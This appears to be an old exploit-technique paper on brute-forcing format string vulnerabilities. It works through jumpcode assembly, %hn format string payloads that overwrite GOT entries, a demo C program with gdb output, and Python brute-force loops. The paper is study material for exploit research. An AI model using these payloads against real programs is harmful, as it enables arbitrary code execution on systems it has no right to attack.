Bruteforcing format strings

Written by : gera

Intro

Is there anything else to say about format strings after all this time? probably yes, or at least we are trying... To start with, go get scut's excellent paper on format strings [1] and read it.

This text is about two tiny tricks that may help speeding up bruteforcing when exploiting format strings bugs...

"...Bruteforcing is not a very happy term, and doesn't make justice for a lot of exploit writers, as most of the time a lot of brain power is used to solve the problem in better ways than just brute force..."

My greets to all those artists who inspired this phrase, specially {MaXX,dvorak,Scrippie}, scut[], lg(zip) and lorian+k.

Using jumpcodes - 32*32 == 32

Ok, first things first...

A format string lets you, after dealing with it, write what you want where you want... I like to call this a write-anything-anywhere primitive, and the trick described here can be used whenever you have a write-anything-anywhere primitive, be it a format string, an overflow over the "destination pointer of a strcpy()", several free()s in a row, a ret2memcpy buffer overflow, etc.

Scut[1], shock[2], and others[3][4] explain several methods to hook the execution flow using a write-anything-anywhere primitive, namely changing GOT, changing some function pointer, atexit() handlers, erm... virtual member of classes, etc. When you do so, you need to know, guess or predict 2 different addresses: function pointer's address and shellcode's address, each has 32 bits, and if you go blindly bruteforcing, you'll need to get 64 bits... well, this is not true, suppose GOT's address always starts with, mmm... 0x0804 and that your code will be in, erm... 0x0805... ok, for linux this may be even true, so it's not 64 bits, but 32 total, so it's just 4,294,967,296 tries... well, no, because you may be able to provide a cushion of 4K nops, so it goes down to 1,048,576 tries, and as GOT must be walked on 4 bytes steps, it's just 262,144... heh, all theese numbers are just... erm... too big.

Well, sometimes there are other tricks you can do, use a read primitive to learn something from the target process, or turn a write primitive into a read primitive, or use more nops, or target stack or just hardcode addresses and go happy with it...

But, there is something else you can do, as you are not limited to writing only 4 bytes, you can write more than the address to the shellcode, you can also write the shellcode!

Write code in any known address

Even with a single format string bug you can write not only more than 4, bytes, but you can also write them to different places in memory, so you can choose any known to be writable and executable address, lets say, 0x8051234 (for some target program running on some linux), write some code there, and change the function pointer (GOT, atexit()'s functions, etc) to point it:

  GOT[read]:     0x8051234     ; of course using read is just
                               ; an example

  0x8051234:     shellcode

What's the difference? Well... shellcode's address is now known, it's always 0x8051234, hence you only have to bruteforce function pointer's address, cutting down the number of bits to 15 in the worst case.

Ok, right, you got me... you cannot write a 200 bytes shellcode using this technique with a format string (or can you?), maybe you can write a 30 bytes shellcode, but may be you only have a few bytes... so, we need a really small jumpcode for this to work.

The code is somewhere else

I'm pretty sure you'll be able to put the code somewhere in target's memory, in stack or in heap, or somewhere else (?). If this is the case, we need our jumpcode to locate the shellcode and jump there, what could be really easy, or a little more tricky.

If the shellcode is somewhere in stack (in the same format string perhaps?) and if you can, more or less, know how far from the SP it will be when the jumpcode is executed, you can jump relative to the SP with just 8 or 5 bytes:

  GOT[read]:      0x8051234

  0x8051234:      add $0x200, %esp   ; delta from SP to code
    	      jmp *%esp          ; just use esp if you can

  esp+0x200:      nops...            ; just in case delta is
                                     ; not really constant
                  real shellcode     ; this is not writen using
                                     ; the format string

Is the code in heap?, but you don't have the slightest idea where it is? Just follow Kato (this version is 18 bytes, Kato's version is a little longer, but only made of letters, he didn't use a format string though):

  GOT[read]:      0x8051234

  0x8051234:      cld
                  mov $0x4f54414a,%eax   ; so it doesn find
                  inc %eax               ; itself (tx juliano)
                  mov $0x804fff0, %edi   ; is it low enough?
		                             ; make it lower
	          repne scasl
	          jcxz .-2               ; keep searching!
	          jmp *$edi              ; upper case letters
	                                 ; are ok opcodes.

  somewhere
    in heap:      KATO              ; if you know the alignment
	
                  KKATO             ; one is enough, otherwise
                  KKATO             ; make some be found
	          KKATO
	          real shellcode

Is it in stack but you don't know where? (10 bytes)

  GOT[read]:      0x8051234

  0x8051234:      mov $0x4f54414a,%ebx   ; so it doesn find
    	      inc %ebx               ; itself (tx juliano)
                  pop %eax
                  cmp %ebx, %eax
    	      jnz .-2
    	      jmp *$esp

  somewhere
   in stack:      KATO              ; you'll know the alignment
                  real shellcode

Something else? ok, you figure your jumpcode yourself :-) But be carefull! 'KATO' may not be a good string, as it's executed and has some side effect. :-)

friendly functions

When changing GOT you can choose what function pointer you want to use, some functions may be better than others for some targets. For example, if you know that after you changed the function pointer, the buffer containing the shellcode will be free()ed, you can just do: (2 bytes)

  GOT[free]:      0x8051234          ; using free this time

  0x8051234:      pop %eax           ; discarding real ret addr
                  ret                ; jump to free's argument    

Same may happen with read() if the same buffer with the shellcode is reused to read more from the net, or syslog() or a lot of other functions... Sometimes you may need a jumpcode a little more complex: (7 or 10 bytes)

   GOT[syslog]:    0x8051234          ; using syslog

   0x8051234:      pop %eax           ; discarding real ret addr
                   pop %eax
    	           add $0x50, %eax    ; skip some non-code bytes
                   jmp *$eax

And if nothing else works, but you can distinguish between a crash and a hung, you can use a jumpcode with an infinite loop that will make the target hung: You bruteforce GOT's address until the server hungs, then you know you have the right address for some GOT entry that works, and you can start bruteforcing the address for the real shellcode.

  GOT[exit]:      0x8051234

  0x8051234:      jmp .              ; infinite loop

No weird addresses

As I don't like choosing arbitrary addresses, like 0x8051234, what we can do is something a little different:

  GOT[free]:      &GOT[free]+4       ; point it to the next 4 bytes
                  jumpcode           ; address is GOT[free]+4

You don't really know GOT[exit]'s address, but on every bruteforcing step you are assuming you know it, then, you can make it point 4 bytes ahead of it, where you can place the jumpcode, i.e. if assume your GOT[exit] is at 0x8049094, your jumpcode will be at 0x8049098, then, you have to write the value 0x8049098 to the address 0x8049094 and the jumpcode to 0x8049098:

  /* fstring.c                                               *
   * demo program to show format strings techinques          *
   * specially crafted to feed your brain by gera@corest.com */

  int main() {
    char buf[1000];

    strcpy(buf,
      "\x94\x90\x04\x08"          // GOT[free]'s address
      "\x96\x90\x04\x08"          // 
      "\x98\x90\x04\x08"          // jumpcode address (2 byte for the demo)
      "%.37004u"                  // complete to 0x9098 (0x9098-3*4)
      "%8$hn"                     // write 0x9098 to 0x8049094
      "%.30572u"                  // complete to 0x10804 (0x10804-0x9098)
      "%9$hn"                     // write 0x0804 to 0x8049096
      "%.47956u"                  // complete to 0x1c358 (0x1c358-0x10804)
      "%10$hn"                    // write 0xc35b (pop - ret) to 0x8049098
	  );

    printf(buf);
  }

  gera@vaiolent:~/papers/gera$ make fstring
  cc     fstring.c   -o fstring

  gera@vaiolent:~/papers/gera$ gdb fstring
  
  (gdb) br main
  Breakpoint 1 at 0x8048439

  (gdb) r
  Breakpoint 1, 0x08048439 in main ()

  (gdb) n
  ...0000000000000...

  (gdb) x/x 0x8049094
  0x8049094:	0x08049098

  (gdb) x/2i 0x8049098
  0x8049098:	pop    %eax
  0x8049099:	ret    

So, if the address of the GOT entry for free() is 0x8049094, the next time free() is called in the program our little jumpcode will be called instead.

This last method has another advantage, it can be used not only on format strings, where you can make every write to a different address, but it can also be used with any write-anything-anywhere primitive, like a "destination pointer of strcpy()" overwrite, or a ret2memcpy buffer overflow. Or if you are as lucky [or clever] as lorian, you may even do it with a single free() bug.

N times faster


Multiple address overwrite

If you can write more than 4 bytes, you can not only put the shellcode or jumpcode where you know it is, you can also change several pointers at the same time, speeding up things again.

Of course this can be done, again, with any write-anything-anywhere primitive which let's you write more than just 4 bytes, and, as we are going to write the same values to all the pointers, there is a cheap way to do it with format strings.

Suppose we are using the following format string to write 0x12345678 at the address 0x08049094:

    "\x94\x90\x04\x08"          // the address to write the first 2 bytes
    "AAAA"                      // space for 2nd %.u
    "\x96\x90\x04\x08"          // the address for the next 2 bytes
    "%08x%08x%08x%08x%08x%08x"  // pop 6 arguments
    "%.22076u"                  // complete to 0x5678 (0x5678-4-4-4-6*8)
    "%hn"                       // write 0x5678 to 0x8049094
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%hn"                       // write 0x1234 to 0x8049096

As %hn does not add characters to the output string, we can write the same value to several locations without having to add more padding. For example, to turn this format string into one that writes the value 0x12345678 to 5 consecutive words starting in 0x8049094 we can use:

    "\x94\x90\x04\x08"          // addresses where to write 0x5678
    "\x98\x90\x04\x08"          // 
    "\x9c\x90\x04\x08"          //
    "\xa0\x90\x04\x08"          //
    "\xa4\x90\x04\x08"          //
    "AAAA"                      // space for 2nd %.u
    "\x96\x90\x04\x08"          // addresses for 0x1234
    "\x9a\x90\x04\x08"          //
    "\x9e\x90\x04\x08"          //
    "\xa2\x90\x04\x08"          //
    "\xa6\x90\x04\x08"          //
    "%08x%08x%08x%08x%08x%08x"  // pop 6 arguments
    "%.22044u"                  // complete to 0x5678: 0x5678-(5+1+5)*4-6*8
    "%hn"                       // write 0x5678 to 0x8049094
    "%hn"                       // write 0x5678 to 0x8049098
    "%hn"                       // write 0x5678 to 0x804909c
    "%hn"                       // write 0x5678 to 0x80490a0
    "%hn"                       // write 0x5678 to 0x80490a4
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%hn"                       // write 0x1234 to 0x8049096
    "%hn"                       // write 0x1234 to 0x804909a
    "%hn"                       // write 0x1234 to 0x804909e
    "%hn"                       // write 0x1234 to 0x80490a2
    "%hn"                       // write 0x1234 to 0x80490a6

Or the equivalent using direct parameter access.

    "\x94\x90\x04\x08"          // addresses where to write 0x5678
    "\x98\x90\x04\x08"          // 
    "\x9c\x90\x04\x08"          //
    "\xa0\x90\x04\x08"          //
    "\xa4\x90\x04\x08"          //
    "\x96\x90\x04\x08"          // addresses for 0x1234
    "\x9a\x90\x04\x08"          //
    "\x9e\x90\x04\x08"          //
    "\xa2\x90\x04\x08"          //
    "\xa6\x90\x04\x08"          //
    "%.22096u"                  // complete to 0x5678 (0x5678-5*4-5*4)
    "%8$hn"                     // write 0x5678 to 0x8049094
    "%9$hn"                     // write 0x5678 to 0x8049098
    "%10$hn"                    // write 0x5678 to 0x804909c
    "%11$hn"                    // write 0x5678 to 0x80490a0
    "%12$hn"                    // write 0x5678 to 0x80490a4
    "%.48060u"                  // complete to 0x11234 (0x11234-0x5678)
    "%13$hn"                    // write 0x1234 to 0x8049096
    "%14$hn"                    // write 0x1234 to 0x804909a
    "%15$hn"                    // write 0x1234 to 0x804909e
    "%16$hn"                    // write 0x1234 to 0x80490a2
    "%17$hn"                    // write 0x1234 to 0x80490a6

In this example, the number of "function pointers" to write at the same time was set arbitrary to 5, but it could have been another number. The real limit depends on the length of the string you can supply, how many arguments you need to pop to get to the addresses if you are not using direct parameter access, if there is a limit for direct parameters access (on Solaris' libraries it's 30, on some Linuxes it's 400, and there may be other variations), etc.

If you are going to combine a jumpcode with multiple address overwrite, you need to have in mind that the jumpcode will not be just 4 bytes after the function pointer, but some more, depending on how many addresses you'll overwrite at once.

Multiple parameter bruteforcing

Sometimes you don't know how many parameters you have to pop, or how many to skip with direct parameter access, and you need to try until you hit the right number. Sometimes it's possible to do it in a more inteligent way, specially when it's not a blind format string. But anyway, there may be cases when you don't know how many parameters to skip, and have to find it out trying, as in the next pythonish example:

    pops = 8
    worked = 0
    while (not worked):
      fstring  = "\x94\x90\x04\x08"        # GOT[free]'s address
      fstring += "\x96\x90\x04\x08"        # 
      fstring += "\x98\x90\x04\x08"        # jumpcode address
      fstring += "%.37004u"                # complete to 0x9098
      fstring += "%%%d$hn" % pops          # write 0x9098 to 0x8049094
      fstring += "%.30572u"                # complete to 0x10804
      fstring += "%%%d$hn" % (pops+1)      # write 0x0804 to 0x8049096
      fstring += "%.47956u"                # complete to 0x1c358
      fstring += "%%%d$hn" % (pops+2)      # write (pop - ret) to 0x8049098
      worked = try_with(fstring)
      pops += 1

In this example, the variable 'pops' is incremented while trying to hit the right number for direct parameter access. If we repeat the target addresses, we can build a format string which lets us increment 'pops' faster. For example, repeating each address 5 times we get a faster bruteforcing:

    pops = 8
    worked = 0
    while (not worked):
      fstring  = "\x94\x90\x04\x08" * 5    # GOT[free]'s address
      fstring += "\x96\x90\x04\x08" * 5    # repeat eddress 5 times
      fstring += "\x98\x90\x04\x08" * 5    # jumpcode address
      fstring += "%.37004u"                # complete to 0x9098
      fstring += "%%%d$hn" % pops          # write 0x9098 to 0x8049094
      fstring += "%.30572u"                # complete to 0x10804
      fstring += "%%%d$hn" % (pops+6)      # write 0x0804 to 0x8049096
      fstring += "%.47956u"                # complete to 0x1c358
      fstring += "%%%d$hn" % (pops+11)     # write (pop - ret) to 0x8049098
      worked = try_with(fstring)
      pops += 5

Hitting any of the 5 copies well be ok, the most copies you can put the better.

This is a simple idea, just repeat the addresses. If it's confusing, grab pen and paper and make some drawings, first draw a stack with the format string in it, and some random number of arguments on top of it, and then start doing the bruteforcing manually... it'll be fun! I guarantee it! :-)

It may look stupid but may help you some day, you never know... and of course the same could be done without direct parameter access, but it's a little more complicated as you have to recalculate the length for %.u format specifiers on every try.

More greets and thanks

riq, for trying every stupid idea I have and making it real!

juliano, for being our format strings guru.

Impact, for forcing me to spend time thinking about all theese amazing things.

References

[1] March 2001. Exploiting Format String Vulnerability, scut's.

[2] w00w00 on Heap Overflows, Matt Conover (shok) and w00w00 Security Team.

[3] Juliano's badc0ded
    http://community.corest.com/~juliano

[4] Google the oracle.
    http://www.google.com